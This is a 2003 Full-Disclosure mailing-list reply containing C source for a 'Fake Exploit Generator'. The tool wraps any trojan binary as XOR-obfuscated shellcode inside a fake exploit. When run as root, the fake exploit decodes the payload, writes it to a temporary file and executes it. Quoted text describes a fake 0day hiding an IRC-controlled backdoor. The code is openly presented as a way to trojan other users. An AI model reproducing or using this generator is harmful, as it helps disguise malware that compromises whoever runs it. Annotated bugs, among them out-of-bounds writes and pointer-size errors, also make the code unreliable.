Message-ID: <200306132239.03885.gml@phrick.net>
From: gml at phrick.net (gml)
Subject: Re: -1 day exploit - Warning
On Friday 13 June 2003 06:51 pm, David Bernick wrote:
Well anyway, I got inspired:
// Fake Exploit Generator
// gml@...ick.net
//
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
// Sets p to the address of c inside b64string and evaluates to true when c
// is not a base64 digit. The length is 64, so the terminating NUL of
// b64string is never matched. memchr()'s prototype is in <string.h>, which
// this file does not include.
#define badchar(c,p) (!(p = memchr(b64string, c, 64)))
// Program run on the generated file at the end of main() via system().
// Because it is defined unconditionally, the #ifdef BEAUTIFY blocks in
// main() are always compiled in.
#define BEAUTIFY "indent"
// Standard base64 alphabet, indexed by 6-bit value; used by badchar()/b64dec().
char b64string[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
// Base64 of the preamble written at the top of the generated file: a
// "// generated with Fake Exploit Generator :: gml@phrick.net" comment line
// followed by #include lines for stdio.h, sys/types.h, sys/stat.h and
// unistd.h. That comment line is a usable fingerprint of files produced by
// this tool. main() passes sizeof(header), which counts the trailing NUL.
static char header[] = {
"Ly8gZ2VuZXJhdGVkIHdpdGggRmFrZSBFeHBsb2l0IEdlbmVyYXRvciA6OiBnbWxAcGhyaWNr"
"Lm5ldAoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1"
"ZGUgPHN5cy9zdGF0Lmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4K"
};
// Base64 of the remainder of the generated program. Decoded, it defines
// usage(), which exit()s unless getuid() == 0 and at least one argument was
// given; setup(), which XORs every byte of shellcode[] with MAX, writes the
// result to a tmpnam() path, chmod()s it 0755, runs it with system() and
// unlink()s it; and a main() that calls usage() then setup(). The embedded
// payload therefore only executes when the "exploit" is run as root.
static char body[] = {
"dm9pZCB1c2FnZShpbnQgYXJncywgY2hhciAqc2VsZikKewoJaWYoZ2V0dWlkKCkgIT0gMCkK"
"CXsKCQlwcmludGYoIlRoaXMgcHJvZ3JhbSByZXF1aXJlcyBwcml2aWxlZGdlcyB5b3UgZG8g"
"bm90IHBvc2Vzcy5cbiIpOwoJCWV4aXQoMCk7Cgl9CgllbHNlCgl7CgoJCWlmKGFyZ3MgPCAy"
"KQoJCXsKCQkJcHJpbnRmKCJ1c2FnZTogJXMgPHRhcmdldD5cbiIsIHNlbGYpOwoJCQlleGl0"
"KDApOwoJCX0KCX0KCn0KCnZvaWQgc2V0dXAoKQp7CgljaGFyICp0bXA7CglGSUxFICpmcDsK"
"CWNoYXIgYnl0ZVswXTsKCWludCBpOwoKCXRtcCA9IHRtcG5hbShOVUxMKTsKCWZwID0gZm9w"
"ZW4odG1wLCAidyIpOwoJaWYoZnApCgl7CgkJZm9yKGkgPSAwOyBpIDwgc2l6ZW9mKHNoZWxs"
"Y29kZSk7IGkrKykKCQl7CgkJCWJ5dGVbMF0gPSBzaGVsbGNvZGVbaV0gXiBNQVg7CgkJCWZ3"
"cml0ZShieXRlLCAxLCAxLCBmcCk7CgkJfQoJCWZjbG9zZShmcCk7CgkJY2htb2QodG1wLCAw"
"NzU1KTsKCQlzeXN0ZW0odG1wKTsKCQl1bmxpbmsodG1wKTsKCX0KfQoKaW50Cm1haW4gKGlu"
"dCBhcmdjLCBjaGFyICphcmd2W10pCnsKCXVzYWdlKGFyZ2MsIGFyZ3ZbMF0pOwoJc2V0dXAo"
"KTsKCS8vIGRvIHNvbWUgc2hpdCBoZXJlCn0K"
};
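/*
 * Value of one base64 digit, or -1 if c is not in b64string.
 * The memchr() length is 64 so the terminating NUL of b64string never
 * matches; memchr()'s prototype is in <string.h>, which this file does not
 * include.
 */
static int b64val(unsigned char c)
{
    const char *p = memchr(b64string, c, 64);
    return p ? (int)(p - b64string) : -1;
}

/*
 * Decode len bytes of base64 text from `from` into `to`.
 *
 * Input is consumed in groups of four digits, each producing three output
 * bytes. A '=' decodes as a zero sextet; in the third or fourth position it
 * is also counted as padding, and that count is reset whenever a later group
 * carries a real digit there. The output is NUL-terminated wherever decoding
 * stopped (on success and on both error paths), so `to` must have room for
 * (len / 4) * 3 + 1 bytes.
 *
 * Returns the number of bytes written minus the padding count, or -1 if a
 * non-alphabet character was seen or len is not a multiple of four. Every
 * complete group decoded before the error is still stored in `to`.
 */
long b64dec (char *to, const char *from, unsigned int len)
{
    const char *fromp = from;
    char *top = to;
    int padding = 0;

    for (; len >= 4; len -= 4) {
        unsigned int bits = 0; /* the four sextets packed into 24 bits */

        for (int i = 0; i < 4; i++) {
            unsigned char c = (unsigned char)*fromp++;
            int v;

            if (c == '=') {
                v = 0;
                if (i >= 2) padding++;      /* only trailing '=' counts as padding */
            } else {
                v = b64val(c);
                if (v < 0) {
                    *top = 0;               /* terminate partial output before failing */
                    return -1;
                }
                if (i >= 2) padding = 0;
            }
            bits = (bits << 6) | (unsigned int)v;
        }
        /* 24 bits -> 3 bytes, high sextet first */
        *top++ = (char)(bits >> 16);
        *top++ = (char)(bits >> 8);
        *top++ = (char)bits;
    }
    *top = 0;
    if (len) return -1;                     /* leftover digits: not a whole group */
    return (top - to) - padding;
}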
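/*
 * Write c to fp as a C "\xNN" escape with exactly two lowercase hex digits.
 *
 * The byte is printed through unsigned char, so a negative char (a byte
 * >= 0x80 on a signed-char platform) yields its two low hex digits directly
 * instead of formatting the sign-extended int into a scratch buffer and
 * picking out its last two characters, which depended on int being 32 bits.
 * fprintf()'s return value is not checked, matching the rest of this file.
 */
void printhex(char c, FILE *fp)
{
    fprintf(fp, "\\x%02x", (unsigned char)c);
}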
// Entry point: reads the file named by argv[1] byte by byte, XORs each byte
// with atoi(argv[3]) and writes a C source file (argv[2]) made of the decoded
// header, "#define MAX <key>", a shellcode[] array of the XORed bytes as
// \xNN escapes, and the decoded body. The BEAUTIFY command is then run on
// argv[2] through system(). Reaching the closing brace returns 0 (C99).
int main(int argc, char *argv[])
{
FILE *trojan;    // input file (argv[1])
FILE *fakeexp;   // generated C file (argv[2])
// Zero-length array (GCC extension): every byte[0] access below lies outside
// the object, so the single input byte is kept in memory the program does not own.
char byte[0];
int count = 0;   // escapes emitted on the current string-literal line (16 per line)
char *out;       // scratch buffer for the decoded header/body; never freed
// Result unchecked. sizeof(body) is an upper bound because base64 expands its input.
out = (char *)malloc(sizeof(body));
// sizeof(out) is the size of the pointer, not of the allocation, so only the
// first few bytes are zeroed here and at the two later memset() calls.
memset(out, 0, sizeof(out));
#ifdef BEAUTIFY
char *cmd;
#endif
if(argc < 4 )
{
printf("usage: %s trojan fakeexp.c key\n", argv[0]);
printf("ex: %s trojan fakeexp.c 187\n", argv[0]);
exit(0);
}
trojan = fopen(argv[1], "r");
fakeexp = fopen(argv[2], "w");
// If only one fopen() succeeded nothing is written and that handle is never
// closed; the BEAUTIFY step below still runs either way.
if(trojan && fakeexp)
{
// sizeof(header) counts the terminating NUL, so len is one more than a
// multiple of four: b64dec() decodes every full group, then returns -1.
// The return value is ignored and out is printed regardless.
b64dec(out, header, sizeof(header));
fprintf(fakeexp, "%s", out);
memset(out, 0, sizeof(out));
// argv[3] is emitted verbatim as the MAX macro and parsed with atoi() below,
// so both sides only agree when it is a plain decimal integer.
fprintf(fakeexp, "\n#define MAX\t%s\n\n", argv[3]);
fprintf(fakeexp, "static char shellcode[] = {\n");
// feof() only becomes true after a read has failed, so the body runs once
// more after the last byte: fread() stores nothing, the memset() below
// covers zero bytes, and whatever byte[0] still holds is XORed again and
// emitted as an extra trailing element.
while(!feof(trojan))
{
memset(byte, 0, sizeof(byte));   // sizeof(byte) is 0: this clears nothing
fread(byte, 1, 1, trojan);       // return value unchecked
byte[0] = byte[0] ^ atoi(argv[3]); // obfuscate (the generated setup() reverses this with MAX)
// count 0 opens a string literal, count 15 prints the 16th escape and closes it.
if(count < 15)
{
if(count == 0)
{
fprintf(fakeexp, "\"");
}
printhex(byte[0], fakeexp);
count++;
}
else
{
printhex(byte[0], fakeexp);
fprintf(fakeexp, "\"\n");
count = 0;
}
}
// Closes the open literal. When the loop ended with count == 0 the previous
// literal was already closed, so this appears to leave an unmatched quote in
// the output.
fprintf(fakeexp, "\"\n};\n\n");
b64dec(out, body, sizeof(body));   // same trailing-NUL situation as for header
fprintf(fakeexp, "%s", out);
memset(out, 0, sizeof(out));
fclose(trojan);
fclose(fakeexp);
}
#ifdef BEAUTIFY
// sizeof(argv[2]) is the pointer size, not the path length, so cmd has a
// fixed small size and the unbounded sprintf() below can overrun it for a
// long argv[2]; argv[2] is also handed to the shell unquoted.
cmd = (char *)malloc(sizeof(BEAUTIFY) * sizeof(argv[2]) + 2);
memset(cmd, 0, sizeof(cmd));   // pointer size again, not the allocation
sprintf(cmd, "%s %s", BEAUTIFY, argv[2]);
system(cmd);
free(cmd);
#endif
}
> > Wow, I'd never run something that had a printf statement in it with
> >
> > print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake
> > 0day exp loit. v2\nPRIVMSG $chan :to run commands on me, type:
> > ".$nick.": command\n";
> >
> > if you run this you deserve to get owned. this guy could have at least
> > xor'd the strings and base64 encoded them or SOMETHING.
>
> the printf statement is in the shellcode. if you don't know C and/or hex
> very well it looks semi-legit. The attached perl code is the decoded shell
> code, it's not in the actual "exploit". This is the perfect kind of
> program to trojan little hacker wannabes on IRC.
>
> and no one deserves to be owned. They just need to pay for highly paid
> security consultants instead (shhh..kidding).
>
> d
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html